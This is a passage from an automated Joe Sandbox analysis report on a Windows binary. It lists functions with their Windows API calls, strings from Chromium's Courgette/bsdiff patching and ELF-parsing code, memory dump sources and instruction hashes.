Part of subcall function 000000014005A0A4: GetModuleHandleExW.KERNEL32 ref: 000000014005A0C0
Part of subcall function 000000014005A0A4: GetProcAddress.KERNEL32 ref: 000000014005A0D6
Part of subcall function 000000014005A0A4: FreeLibrary.KERNEL32 ref: 000000014005A0F3

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: f99406282f4596845ff29f298710b10a10c70e449a6f289b8591fd6f3504fd30
Instruction ID: 1b507a2c2731dd446cd88915c8fc7e827916e1d76a3c75e38c54c572ee3989d7
Opcode Fuzzy Hash: f99406282f4596845ff29f298710b10a10c70e449a6f289b8591fd6f3504fd30
Instruction Fuzzy Hash: 50218E32B02B448AEB66DF65C4443EC37B0F749788F44452AE71D43BA5EB3AC584CB94

Function 0000000140057960 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000140057991

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ffe6bb4d5fbcf523da46317627443463dc0b49a9e6ab8bb1d2e9e553f15edf97
Instruction ID: 9ad34ebf30e7fd09b5739fef2423c1480278256cbd00caf8188c8e082b4e51c4
Opcode Fuzzy Hash: ffe6bb4d5fbcf523da46317627443463dc0b49a9e6ab8bb1d2e9e553f15edf97
Instruction Fuzzy Hash: 3211AF76A10B5599EB11CFA1E8816DC37B8F71839CF500626EA4C13B69EB3082A5C390

Function 000000014005F3F0 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014005F425

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e6c372b6c890f0e587701b63ebb19f21c306433cc7b09a4be1b3c6e45bc6a6c4
Instruction ID: 12f99c2fa17d13fe4aecc149d2012aec502c339d4e8d3d59a834389978e001ff
Opcode Fuzzy Hash: e6c372b6c890f0e587701b63ebb19f21c306433cc7b09a4be1b3c6e45bc6a6c4
Instruction Fuzzy Hash: 85012972A10B1998EB02DFA0E8407EC37F8F728798F940525EF4813768EB35C2A5C780

Function 00000001400581EC Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 000000014005825C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400582E1

_invalid_parameter_noinfo.LIBCMT ref: 000000014005824F

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 32ea98dcc27e3e306fa2dae1ca755bde78060dca7597fd785f1e44a546da2c0d
Instruction ID: a696e3985ddf90bd0c32919efce16cf25ff8a96e0bf7c6a873080e2c75055908
Opcode Fuzzy Hash: 32ea98dcc27e3e306fa2dae1ca755bde78060dca7597fd785f1e44a546da2c0d
Instruction Fuzzy Hash: 53F06271100A4445EF7ADF7684953E82BA1D74EBE4F285625EF191B3F6DA37C882C321

Function 0000000140018720 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014001872B

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ee5601930f936c08369026b7e135fdadfbc081cdc6bc40b9ca5c9e2891c9a5c9
Instruction ID: 41c2d6eccf180b0b290d6367230ab015cecdbdf60c97ba962b2bb350cb5e4526
Opcode Fuzzy Hash: ee5601930f936c08369026b7e135fdadfbc081cdc6bc40b9ca5c9e2891c9a5c9
Instruction Fuzzy Hash: 4CC04C7BB2155083F74DAB275C517952252A3ED350FD49115DE0A42760D93502964A04

Non-executed Functions

Function 0000000140013FF0 Relevance: 27.0, APIs: 10, Strings: 5, Instructions: 716COMMON

Download Yara Rule

Strings

Windows.FilesystemError., xrefs: 0000000140014A4E
Windows.PostOperationState., xrefs: 00000001400149A7
DeleteFile.NonRecursive, xrefs: 000000014001461C
DeleteFile.Recursive, xrefs: 0000000140014615
*, xrefs: 0000000140014859

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: *$DeleteFile.NonRecursive$DeleteFile.Recursive$Windows.FilesystemError.$Windows.PostOperationState.
API String ID: 0-719519982
Opcode ID: 7d9f16f090a6071d740afee69f2df969f7471cf803da919db9e847c042676280
Instruction ID: f75d85f2852f410d2be31a46d1c950aee7d7a5930d62332632cbfaa7343ef0d1
Opcode Fuzzy Hash: 7d9f16f090a6071d740afee69f2df969f7471cf803da919db9e847c042676280
Instruction Fuzzy Hash: 38527172A14B8081EB229B16E4443EA6361F79DBE4F504315FFAA0B7F9DB79C581C340

Function 0000000140071A78 Relevance: 25.8, APIs: 9, Strings: 5, Instructions: 1257COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 0000000140071AC1
_invalid_parameter_noinfo.LIBCMT ref: 00000001400720E2
_invalid_parameter_noinfo.LIBCMT ref: 00000001400722A5
_invalid_parameter_noinfo.LIBCMT ref: 00000001400724AA
memcpy_s.LIBCPMT ref: 0000000140072A50
memcpy_s.LIBCPMT ref: 0000000140072AF7
memcpy_s.LIBCPMT ref: 0000000140072BC0

Part of subcall function 00000001400655EC: _invalid_parameter_noinfo.LIBCMT ref: 0000000140065611

Strings

1#INF, xrefs: 0000000140072C9B
1#SNAN, xrefs: 0000000140072C5B
1#QNAN, xrefs: 0000000140072C7B
MZx, xrefs: 0000000140072101, 0000000140072168, 00000001400724CD, 00000001400725A5, 0000000140072608, 0000000140072937
1#IND, xrefs: 0000000140072C3B

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$MZx
API String ID: 808467561-2638907429
Opcode ID: 3fc9532a9e8e93632bc0c3afc2e308be7481b71047de99a9ee56f1ad3af329b5
Instruction ID: b6d853d0f41bd63edd08794ce228b5cd10614e4f0c5a297c1d816b25b22d9e22
Opcode Fuzzy Hash: 3fc9532a9e8e93632bc0c3afc2e308be7481b71047de99a9ee56f1ad3af329b5
Instruction Fuzzy Hash: 72B203B26102818BE77ACE6AD540BED37A5F39C7C8F505115EB0667BA9DB38CA44CB00

Function 000000014000BD30 Relevance: 16.9, Strings: 13, Instructions: 648COMMON

Download Yara Rule

Strings

Control tuples: , xrefs: 000000014000C6C0
mistakes: , xrefs: 000000014000C6F3
Start bsdiff, xrefs: 000000014000BDAB
End bsdiff , xrefs: 000000014000C775
Uncompressed bsdiff patch size , xrefs: 000000014000C752
bytes, xrefs: 000000014000C542
(skips: , xrefs: 000000014000C70E
extra bytes: , xrefs: 000000014000C737
GBSDIF42, xrefs: 000000014000C5B6
../../courgette/third_party/bsdiff/bsdiff_create.cc, xrefs: 000000014000BD6B, 000000014000BD80, 000000014000BEDC, 000000014000BF0D, 000000014000C4FC, 000000014000C67C, 000000014000C695
Could not allocate I[], , xrefs: 000000014000C527
copy bytes: , xrefs: 000000014000C6D8
done divsufsort , xrefs: 000000014000BF3B

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$ErrorFacet_FileLastLockit::_Lockit::~_RegisterWrite
String ID: End bsdiff $Uncompressed bsdiff patch size $ (skips: $ copy bytes: $ extra bytes: $ mistakes: $ bytes$ done divsufsort $../../courgette/third_party/bsdiff/bsdiff_create.cc$Control tuples: $Could not allocate I[], $GBSDIF42$Start bsdiff
API String ID: 1661407032-1433270219
Opcode ID: 373e5cbd17572b4f39768a8d05fbf97d5894f8c2c51663afc6ed49f22456d72e
Instruction ID: c5e60f79c07f467fe0a4ff840d0175cd6c1fe9d043eaac31237bc6ec020eeb05
Opcode Fuzzy Hash: 373e5cbd17572b4f39768a8d05fbf97d5894f8c2c51663afc6ed49f22456d72e
Instruction Fuzzy Hash: F352B372319A8486EB21DB26F8907DBB3A1F7897C4F404125EB8D47BAADF79C445CB40

Function 000000014001F4A0 Relevance: 14.0, Strings: 11, Instructions: 295COMMON

Download Yara Rule

Strings

Not a supported architecture, xrefs: 000000014001F5A5
Out of bounds section header table, xrefs: 000000014001F55E
Out of bounds string section index, xrefs: 000000014001F8C1
Out of bounds program header table, xrefs: 000000014001F823
Out of bounds section or segment, xrefs: 000000014001F8E6
Not an executable file or shared library, xrefs: 000000014001F59C
String section does not terminate, xrefs: 000000014001F8B5
No Magic Number, xrefs: 000000014001F567
Too small, xrefs: 000000014001F4D5
Unknown file version, xrefs: 000000014001F5AE
Unexpected section header size, xrefs: 000000014001F5B7

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: No Magic Number$Not a supported architecture$Not an executable file or shared library$Out of bounds program header table$Out of bounds section header table$Out of bounds section or segment$Out of bounds string section index$String section does not terminate$Too small$Unexpected section header size$Unknown file version
API String ID: 0-2876074490
Opcode ID: 6bf1b1d24fde376f679e567b6fb4c0a8c7b12de8e4609220e478d9a236b03162
Instruction ID: d29160d85348759a05f02097ba73cac2296f8b0c971b3e11a6c20160998bf276
Opcode Fuzzy Hash: 6bf1b1d24fde376f679e567b6fb4c0a8c7b12de8e4609220e478d9a236b03162
Instruction Fuzzy Hash: 91D18E72614A8482EB66DF1AE4443FDA3A1F788BD4F544212FB5A0B7B4DF7AD486D300

Function 000000014003EF80 Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 572COMMON

Download Yara Rule

Strings

, mean = %.1f, xrefs: 000000014003F04C
(flags = 0x%x), xrefs: 000000014003F06B
{%3.1f%%}, xrefs: 000000014003F548
Histogram: %s recorded %d samples, xrefs: 000000014003F01B
... , xrefs: 000000014003F2CF

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: (flags = 0x%x)$ {%3.1f%%}$, mean = %.1f$... $Histogram: %s recorded %d samples
API String ID: 0-513715224
Opcode ID: 919d423d1110ad2a00645c04691401c7e1654dd10d495d4dd533c6a107ccd6f3
Instruction ID: cc35a7f7e0741b72e92f320b5e4d345d93ed631058e5bb1e8fb6ac5979cb4c11
Opcode Fuzzy Hash: 919d423d1110ad2a00645c04691401c7e1654dd10d495d4dd533c6a107ccd6f3
Instruction Fuzzy Hash: 77225A76304B8486EA169B27E4443EAA7A2F78DFC4F448622EF5A47BB5DF39C045D340

Function 00000001400441B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71libraryloaderCOMMON

Download Yara Rule

APIs

_Init_thread_header.LIBCMT ref: 0000000140044217
GetVersionExW.KERNEL32 ref: 0000000140044248
GetNativeSystemInfo.KERNEL32 ref: 0000000140044265
GetModuleHandleW.KERNEL32 ref: 0000000140044288
GetProcAddress.KERNEL32 ref: 0000000140044298

Strings

kernel32.dll, xrefs: 0000000140044281
GetProductInfo, xrefs: 000000014004428E

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: AddressHandleInfoInit_thread_headerModuleNativeProcSystemVersion
String ID: GetProductInfo$kernel32.dll
API String ID: 2057628103-182221857
Opcode ID: c21e704e61e2c475a0662d12c5cd95dea48f17f65cf9d04636de6b008b5015e1
Instruction ID: c85f358f0da03a53c160ee39710cfbe5d7fe8eed654d126b68d1ba59229145c2
Opcode Fuzzy Hash: c21e704e61e2c475a0662d12c5cd95dea48f17f65cf9d04636de6b008b5015e1
Instruction Fuzzy Hash: 45315C31210A8092EB52DB16F841BDA73A0FBDD7D8F814211FB49436B4DF38D645CB40

Function 0000000140028D50 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 284fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,-00000014,00000000), ref: 0000000140028DD7
FindClose.KERNEL32 ref: 0000000140028E87
GetFileAttributesW.KERNEL32 ref: 0000000140029054

Strings

DeleteFile.NonRecursive, xrefs: 0000000140028D51

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: FileFind$AttributesCloseNext
String ID: DeleteFile.NonRecursive
API String ID: 730532403-3982342438
Opcode ID: 5531b49dfc58a119cb03ba37abfefe2eb8b420fe12e0fcde6832843904d86859
Instruction ID: 5331077c2d07b934173b108a9845b11a79e1d08a66e864bd0d7ab6c5dc1f740d
Opcode Fuzzy Hash: 5531b49dfc58a119cb03ba37abfefe2eb8b420fe12e0fcde6832843904d86859
Instruction Fuzzy Hash: 2DC18E36301A8095FBAA8B23E9483DD63A1F748BD8F404629EF695B7F4DF759865C300

Function 000000014006CA78 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

EnumSystemLocalesW.KERNEL32(00000001,?,?,00000000,?,00000000,?,000000014005A8B3), ref: 000000014006CBCF
GetUserDefaultLCID.KERNEL32(00000001,?,?,00000000), ref: 000000014006CBE8
ProcessCodePage.LIBCMT ref: 000000014006CC12
IsValidCodePage.KERNEL32 ref: 000000014006CC24
IsValidLocale.KERNEL32 ref: 000000014006CC3A
GetLocaleInfoW.KERNEL32 ref: 000000014006CC96
GetLocaleInfoW.KERNEL32 ref: 000000014006CCB2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: 6df56e4eef014f2fa02cb69e1753452763c626bd32391d7699f47b07508215dc
Instruction ID: b790f55fe0e5c240f1cc5ba1fbba4569e5d2da797a65ff8214848e19c36bb906
Opcode Fuzzy Hash: 6df56e4eef014f2fa02cb69e1753452763c626bd32391d7699f47b07508215dc
Instruction Fuzzy Hash: 447169327207408AFB129B62DC51BEC33A2BB4CBD4F644926AB1D577A5EB38C945C350

Function 00000001400544DC Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000001400544F8
RtlCaptureContext.KERNEL32 ref: 0000000140054524
RtlLookupFunctionEntry.KERNEL32 ref: 000000014005453E
RtlVirtualUnwind.KERNEL32 ref: 000000014005457F
IsDebuggerPresent.KERNEL32 ref: 00000001400545D3
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400545F4
UnhandledExceptionFilter.KERNEL32 ref: 00000001400545FF

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 4cc5d1b1f70f7df502758b022cd7028897b0ad23af3c00013f1770f326e5a3c8
Instruction ID: 430f38193f4a6e3dee5823cd4232086f2359c9db052ea53f42b0742eaf2b0f5f
Opcode Fuzzy Hash: 4cc5d1b1f70f7df502758b022cd7028897b0ad23af3c00013f1770f326e5a3c8
Instruction Fuzzy Hash: 6B316072205B808AEB61DF61E8507ED7375F788788F44452AEB4E47BA9EF39C648C710

Function 0000000140009CD0 Relevance: 9.5, APIs: 6, Instructions: 527COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000140009DD1
std::_Facet_Register.LIBCPMT ref: 0000000140009E36
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140009E5B
std::_Lockit::_Lockit.LIBCPMT ref: 0000000140009F02
std::_Facet_Register.LIBCPMT ref: 0000000140009F6C
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140009F91

Memory Dump Source

